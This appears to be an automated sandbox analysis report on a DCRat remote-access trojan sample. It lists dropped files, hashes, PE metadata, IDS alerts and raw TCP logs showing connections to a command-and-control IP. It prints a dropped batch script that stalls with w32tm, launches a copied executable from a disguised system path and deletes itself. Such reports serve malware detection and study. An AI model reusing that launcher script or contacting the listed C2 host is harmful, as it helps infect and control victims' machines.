            SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
            SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
            Malicious:true
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\Recovery\xMLVfJVxhYAkoCJ.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):25
            Entropy (8bit):4.323856189774723
            Encrypted:false
            SSDEEP:3:xQfA2g1:xKA2u
            MD5:E1EF6028E4FB119FA25ACEFC7D6F5851
            SHA1:D06BDBA2EAF770C14263FA96533917DD68BE6927
            SHA-256:FEF2C6CA57FDE660EB5F5A544BD5916284120832E5D910335C082FA5958C5248
            SHA-512:F21FE1945035DAC70A89AB6313E69DAA5856ABADD112B3224A5E07C4373A3D774086A1FD28D233988A413762689B4008485BFC34594668832FA0201C94C4C42C
            Malicious:false
            Preview:FGG67Fzdm1oPYEvtflbsExYrM
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:DOS batch file, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):251
            Entropy (8bit):5.170984888246542
            Encrypted:false
            SSDEEP:6:hITg3Nou11r+DER5I3uhuAg53BvKOZG1N723fOXBAf:OTg9YDEfThuAg5xEaQBe
            MD5:BF4B8E79A16DB96E0507058BC509294B
            SHA1:EDBB942FB8F80B169BBE51A98DB38B26CB2C178B
            SHA-256:C8088C4985EA23EAF79F2B70DC514DC4149ED3E57DF1FCE8F94B00662387C528
            SHA-512:98557915089F3DEF270FF55D37CFA4355BA0E33167BC377346F3D66871EEEBC16E4483218598208DB87A6A78263969E3B14469D43625701DD8851B4DE6EBFF92
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:@echo off..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\yrs7rIEeUp.bat"
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with very long lines (509), with no line terminators
            Category:dropped
            Size (bytes):509
            Entropy (8bit):5.863633043683969
            Encrypted:false
            SSDEEP:12:fQ04ZMgWUdVnJeuE4gUk1V1d61pGOFLAMBdk7FzUfoqd/W6kGQ+TnyADJ:fQ04ZMDYE4hkr+1bLAMf5Pk8nDJ
            MD5:6D28F4A061D5052AD2ABF2548D475BAA
            SHA1:976918A6BD8D9566935E42837B0D0D66F3C60E7F
            SHA-256:37E3241632361E11CF822D4475430702B13EEA687300C962BE72598B040C1C23
            SHA-512:6B3FE2182CAFFB20EA39EE36C783C3BA1884B04DE52EF941EA4CE8D69CCBE6697FA6C50092CCD60BF26DF41598FCBDFE402A633392DA77EDE8103451A2AFF74B
            Malicious:false
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1253376
            Entropy (8bit):6.955347152884786
            Encrypted:false
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            MD5:20CF7F39EDEF3DB30F388829C5A3F05C
            SHA1:009EB186382733844B2D8C5202D0DA9AC1F8DFB0
            SHA-256:2554C3BD1B50FCCF6833EB50179C877A95FCE8135031204E8E678C4D8C5DB89F
            SHA-512:45F488593628CD09BECAC56D0090DC7198B251AC53FB4AFC830073F5B29E3880AA18B84BFB03A9BD6094D4ADCDC11317A1CC664FF5CEA7D7049A5A69EAC18B12
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 79%
            Process:C:\Users\user\Desktop\XPC5PMKegV.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:false
            Preview:[ZoneTransfer]....ZoneId=0
            Process:C:\Windows\System32\w32tm.exe
            File Type:ASCII text
            Category:dropped
            Size (bytes):151
            Entropy (8bit):4.791322165551786
            Encrypted:false
            SSDEEP:3:VLV993J+miJWEoJ8FXV6NXXKvo1AFAXaNvj:Vx993DEUDX126X8
            MD5:593AD96BFACA0FE27AEC450F68C2F24A
            SHA1:F2E11F6BC5A2CC6F462897CB9A41A37A0C46690B
            SHA-256:990D28A5F6C810050DE317D3DE94DAAE94AA43912D6C1CD11E0B6A00A144B878
            SHA-512:F8FC98DE0F1FC8AF6ADB789548C5C2D74B36A28C02FBBECF1E99F4D0CB46C135846F3F6A3575E3EF68FFEFF7E3A22A3B42304433204A83BA62F4D479121334D0
            Malicious:false
            Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 28/08/2024 10:52:21..10:52:21, error: 0x80072746.10:52:26, error: 0x80072746.
            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Entropy (8bit):6.955347152884786
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 49.79%
            • Win32 Executable (generic) a (10002005/4) 49.75%
            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
            • Windows Screen Saver (13104/52) 0.07%
            • Win16/32 Executable Delphi generic (2074/23) 0.01%
            File name:XPC5PMKegV.exe
            File size:1'253'376 bytes
            MD5:20cf7f39edef3db30f388829c5a3f05c
            SHA1:009eb186382733844b2d8c5202d0da9ac1f8dfb0
            SHA256:2554c3bd1b50fccf6833eb50179c877a95fce8135031204e8e678c4d8c5db89f
            SHA512:45f488593628cd09becac56d0090dc7198b251ac53fb4afc830073f5b29e3880aa18b84bfb03a9bd6094d4adcdc11317a1cc664ff5cea7d7049a5a69eac18b12
            SSDEEP:24576:nlWmSIicCBo2ugqxe4AuMylBW2ZZo3/n/HV+MZ+oRzyeM:lriNuzxcUo2Z6//1+cjxye
            TLSH:15455A027E44CA12F40913B7C2EF464847B4A9916AA6E32B7DBA737D55123A73C4CDCB
            Icon Hash:00928e8e8686b000
            Entrypoint:0x5305de
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Time Stamp:0x62DD6184 [Sun Jul 24 15:13:08 2022 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:4
            OS Version Minor:0
            File Version Major:4
            File Version Minor:0
            Subsystem Version Major:4
            Subsystem Version Minor:0
            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
            Instruction
            jmp dword ptr [00402000h]
            Name                                  Virtual Address  Virtual Size  Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
            IMAGE_DIRECTORY_ENTRY_IMPORT          0x130590         0x4b          .text
            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x136000         0x31c         .rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC       0x138000         0xc           .reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
            IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
            IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
            Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
            .text   0x2000           0x12e5e4      0x12e600  71989a2fbe93bd7bc6790a8a67e5f182  False     0.6678839719408847  data       6.988119508345658    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .sdata  0x132000         0x2fdf        0x3000    7bc479402a0f90458733b96261aca5c4  False     0.3101399739583333  data       3.243241603062459    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc   0x136000         0x31c         0x400     7cc0adee05c866afd88d5f7bf2194b18  False     0.361328125         data       2.646068329127162    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc  0x138000         0xc           0x200     b9cbfa0bb36d29b58fc0540c3c5e8bb1  False     0.044921875         data       0.08153941234324169  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            Name        RVA       Size   Type  Language  Country        ZLIB Complexity
            RT_VERSION  0x136058  0x2c4  data  English   United States  0.4717514124293785
            DLL          Import
            mscoree.dll  _CorExeMain
            Language of compilation system  Country where language is spoken
            English                         United States
            Timestamp                        Protocol  SID      Signature                        Severity  Source Port  Dest Port  Source IP    Dest IP
            2024-08-28T15:33:05.344387+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51868        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:36.984645+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51883        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:21.097692+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49718        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:37.126376+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49727        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:59.790382+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51891        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:31.565096+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49724        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:06.567162+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51870        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:21.697481+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49719        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:35.764312+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51881        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:37.876203+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49728        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:42.156568+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51885        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:22.963796+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51875        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:04.720687+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51867        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:20.478417+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49717        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:35.893759+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49725        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:24.207738+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51877        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:42.765236+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51886        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:23.579696+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51876        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:48.124816+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51859        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:29.712573+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49721        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:43.410775+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51887        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:48.730443+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51860        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:13.321787+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51873        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:54.044731+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51864        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:44.007271+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51888        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:30.956596+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49723        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:59.191453+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51890        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:36.518457+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49726        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:58.527866+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51889        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:24.813155+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51878        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:19.857080+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49716        80         192.168.2.6  92.63.98.227
            2024-08-28T15:34:00.390952+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51892        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:47.497104+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51858        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:11.912213+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51871        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:13.921189+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51874        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:12.521816+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51872        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:37.591556+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51884        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:36.379420+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51882        80         192.168.2.6  92.63.98.227
            2024-08-28T15:33:05.947903+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51869        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:54.639914+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51865        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:52.796486+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51862        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:53.437128+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51863        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:30.339189+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         49722        80         192.168.2.6  92.63.98.227
            2024-08-28T15:32:49.326493+0200  TCP       2034194  ET MALWARE DCRAT Activity (GET)  1         51861        80         192.168.2.6  92.63.98.227
            Timestamp  Source Port  Dest Port  Source IP  Dest IP
            Aug 28, 2024 15:32:36.518456936 CEST4972680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:36.520976067 CEST4972680192.168.2.692.63.98.227
            Aug 28, 2024 15:32:36.520979881 CEST4972780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:36.525959969 CEST804972692.63.98.227192.168.2.6
            Aug 28, 2024 15:32:36.525971889 CEST804972792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:36.526056051 CEST4972780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:36.526133060 CEST4972780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:36.531620979 CEST804972792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.123151064 CEST804972792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.126375914 CEST4972780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.126579046 CEST4972780192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.126847029 CEST4972880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.132966995 CEST804972792.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.132980108 CEST804972892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.133057117 CEST4972880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.133161068 CEST4972880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.138050079 CEST804972892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.876094103 CEST804972892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:37.876203060 CEST4972880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.876391888 CEST4972880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:37.881172895 CEST804972892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:46.880820990 CEST5185880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:46.885754108 CEST805185892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:46.885849953 CEST5185880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:46.886065960 CEST5185880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:46.890863895 CEST805185892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:47.497040987 CEST805185892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:47.497103930 CEST5185880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:47.500103951 CEST5185880192.168.2.692.63.98.227
            Aug 28, 2024 15:32:47.501667976 CEST5185980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:47.504909039 CEST805185892.63.98.227192.168.2.6
            Aug 28, 2024 15:32:47.506639957 CEST805185992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:47.506710052 CEST5185980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:47.506887913 CEST5185980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:47.511729002 CEST805185992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.124619961 CEST805185992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.124815941 CEST5185980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.124878883 CEST5185980192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.127939939 CEST5186080192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.129715919 CEST805185992.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.132754087 CEST805186092.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.132827997 CEST5186080192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.132966042 CEST5186080192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.137789965 CEST805186092.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.728179932 CEST805186092.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.730443001 CEST5186080192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.730478048 CEST5186080192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.730946064 CEST5186180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.735363007 CEST805186092.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.735749960 CEST805186192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:48.735830069 CEST5186180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.735930920 CEST5186180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:48.740748882 CEST805186192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:49.324856043 CEST805186192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:49.326493025 CEST5186180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:49.330153942 CEST5186180192.168.2.692.63.98.227
            Aug 28, 2024 15:32:49.335088968 CEST805186192.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.179207087 CEST5186280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.184371948 CEST805186292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.184473991 CEST5186280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.184604883 CEST5186280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.189404011 CEST805186292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.796402931 CEST805186292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.796485901 CEST5186280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.836227894 CEST5186280192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.837270021 CEST5186380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.841088057 CEST805186292.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.842096090 CEST805186392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:52.842164040 CEST5186380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.842684031 CEST5186380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:52.847569942 CEST805186392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:53.437060118 CEST805186392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:53.437128067 CEST5186380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:53.437206984 CEST5186380192.168.2.692.63.98.227
            Aug 28, 2024 15:32:53.439496040 CEST5186480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:53.442171097 CEST805186392.63.98.227192.168.2.6
            Aug 28, 2024 15:32:53.444407940 CEST805186492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:53.444561958 CEST5186480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:53.444685936 CEST5186480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:53.449512959 CEST805186492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.044675112 CEST805186492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.044730902 CEST5186480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.044821978 CEST5186480192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.045140982 CEST5186580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.049693108 CEST805186492.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.049962044 CEST805186592.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.050054073 CEST5186580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.050138950 CEST5186580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.054874897 CEST805186592.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.639832973 CEST805186592.63.98.227192.168.2.6
            Aug 28, 2024 15:32:54.639914036 CEST5186580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.640058994 CEST5186580192.168.2.692.63.98.227
            Aug 28, 2024 15:32:54.644886971 CEST805186592.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.125274897 CEST5186780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.130146980 CEST805186792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.130220890 CEST5186780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.130373955 CEST5186780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.135116100 CEST805186792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.720621109 CEST805186792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.720686913 CEST5186780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.727936029 CEST5186780192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.728612900 CEST5186880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.735187054 CEST805186792.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.736469030 CEST805186892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:04.736556053 CEST5186880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.736651897 CEST5186880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:04.743999004 CEST805186892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.344212055 CEST805186892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.344387054 CEST5186880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.344502926 CEST5186880192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.346785069 CEST5186980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.352264881 CEST805186892.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.354286909 CEST805186992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.354358912 CEST5186980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.354413033 CEST5186980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.362514019 CEST805186992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.947752953 CEST805186992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.947902918 CEST5186980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.948004007 CEST5186980192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.948343039 CEST5187080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.952771902 CEST805186992.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.953139067 CEST805187092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:05.953402996 CEST5187080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.953476906 CEST5187080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:05.958261013 CEST805187092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:06.567076921 CEST805187092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:06.567162037 CEST5187080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:06.567250967 CEST5187080192.168.2.692.63.98.227
            Aug 28, 2024 15:33:06.571957111 CEST805187092.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.319086075 CEST5187180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.324013948 CEST805187192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.324124098 CEST5187180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.324280977 CEST5187180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.329046011 CEST805187192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.912022114 CEST805187192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.912213087 CEST5187180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.914129019 CEST5187180192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.914789915 CEST5187280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.919012070 CEST805187192.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.919641018 CEST805187292.63.98.227192.168.2.6
            Aug 28, 2024 15:33:11.919703960 CEST5187280192.168.2.692.63.98.227
            Aug 28, 2024 15:33:11.919771910 CEST5187280192.168.2.692.63.98.227
